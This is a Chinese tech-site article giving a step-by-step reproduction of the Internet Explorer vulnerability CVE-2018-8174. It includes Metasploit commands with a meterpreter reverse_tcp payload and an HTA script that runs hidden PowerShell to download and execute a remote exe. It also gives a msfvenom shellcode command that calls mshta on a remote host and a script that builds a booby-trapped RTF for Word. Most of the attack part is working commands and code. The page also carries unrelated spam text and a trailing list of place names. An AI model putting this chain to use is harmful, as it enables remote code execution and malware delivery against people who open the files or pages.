中文字幕av专区_日韩电影在线播放_精品国产精品久久一区免费式_av在线免费观看网站

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

怎么實現0day漏洞CVE-2018-8174的復現

發布時間:2021-12-22 21:38:06 來源:億速云 閱讀:377 作者:柒染 欄目:安全技術

今天就跟大家聊聊有關怎么實現0day漏洞CVE-2018-8174的復現,可能很多人都不太了解,為了讓大家更加了解,小編給大家總結了以下內容,希望大家根據這篇文章可以有所收獲。

POC驗證

未打補丁系統,IE瀏覽器打開此地址會彈出計算器 。

http://test.lr3800.com/CVE-2018-8174_PoC.html

怎么實現0day漏洞CVE-2018-8174的復現

metasploit 復現

下載 metasploit 模塊到本地

git clone https://github.com/0x09AL/CVE-2018-8174-msf.git

將CVE-2018-8174.rb復制到 fileformat 目錄

cp CVE-2018-8174.rb /usr/share/metasploit-framework/modules/exploits/windows/fileformat/

將CVE-2018-8174.rtf復制到 exploits 目錄

cp CVE-2018-8174.rtf /usr/share/metasploit-framework/data/exploits/

啟動 metasploit

use exploit/windows/fileformat/CVE-2018-8174
set PAYLOAD windows/meterpreter/reverse_tcp
set srvhost 192.168.0.116
set lhost 192.168.0.116
exploit

怎么實現0day漏洞CVE-2018-8174的復現

復制 /root/.msf4/local/目錄中的 msf.rtf 文件到目標主機上使用word文檔打開    
或者IE瀏覽器打開 http://192.168.0.116:8080 即可獲得會話

自定義下載者 復現

利用 mshta 從遠程服務器下載文件執行。

請先下載poc附件,下文中使用 鏈接:https://pan.baidu.com/s/14vP4CMdjEKkRdHBb7vLSHg 密碼:ci8h

1.構造HTA文件,當訪問hta文件就會觸發powershell下載文件至臨時目錄執行

準備你的xx.exe文件上傳至站點目錄,假如得到地址 http://xxx.com/xxx.exe

怎么實現0day漏洞CVE-2018-8174的復現

HTA代碼:

<script>
a=new ActiveXObject("WScript.Shell");
a.run('%SystemRoot%/system32/WindowsPowerShell/v1.0/powershell.exe -windowstyle hidden (new-object System.Net.WebClient).DownloadFile(\'http://xxx.com/xxx.exe\', \'c:/windows/temp/xxx.exe\'); c:/windows/temp/xxx.exe', 0);window.close();
</script>

把該文件命名 8174.hta 上傳至站點目錄;假如得到地址 http://xxx.lr3800.com/8174.hta

2.使用msfvenom生成 js Shellcode

msfvenom -p windows/exec cmd='mshta http://xxx.lr3800.com/8174.hta' -f js_le exitfunc=thread -a x86

怎么實現0day漏洞CVE-2018-8174的復現

把生成的Shellcode字符替換至 8174poc.html 166行代碼

怎么實現0day漏洞CVE-2018-8174的復現怎么實現0day漏洞CVE-2018-8174的復現

把 8174poc.html 文件上傳至站點目錄 假如得到地址 http://xxx.lr3800.com/8174poc.html

3.生成Word文檔

* 下載python腳本保存本地

git clone https://github.com/Yt1g3r/CVE-2018-8174_EXP.git

運行 CVE-2018-8174.py

python CVE-2018-8174.py -u http://xxx.lr3800.com/8174poc.html -o exp.rtf

怎么實現0day漏洞CVE-2018-8174的復現

得到目錄中的 “exp.rtf ”文件,使用Word文檔打開即可下載執行xx.exe文件,或者IE瀏覽器打開 http://xxx.lr3800.com/8174poc.html    即可下載執行xx.exe文件

看完上述內容,你們對怎么實現0day漏洞CVE-2018-8174的復現有進一步的了解嗎?如果還想了解更多知識或者相關內容,請關注億速云行業資訊頻道,感謝大家的支持。

向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

AI

哈巴河县| 南平市| 寿宁县| 怀化市| 平湖市| 泰顺县| 余庆县| 襄城县| 于田县| 湖北省| 永寿县| 临泉县| 德江县| 宁强县| 牙克石市| 许昌市| 乌恰县| 太谷县| 德阳市| 刚察县| 昌吉市| 探索| 保德县| 辛集市| 台湾省| 蓬溪县| 罗甸县| 建阳市| 锡林浩特市| 娄烦县| 雅江县| 遂平县| 安国市| 阳朔县| 化德县| 黄石市| 门源| 云梦县| 五峰| 射阳县| 原阳县|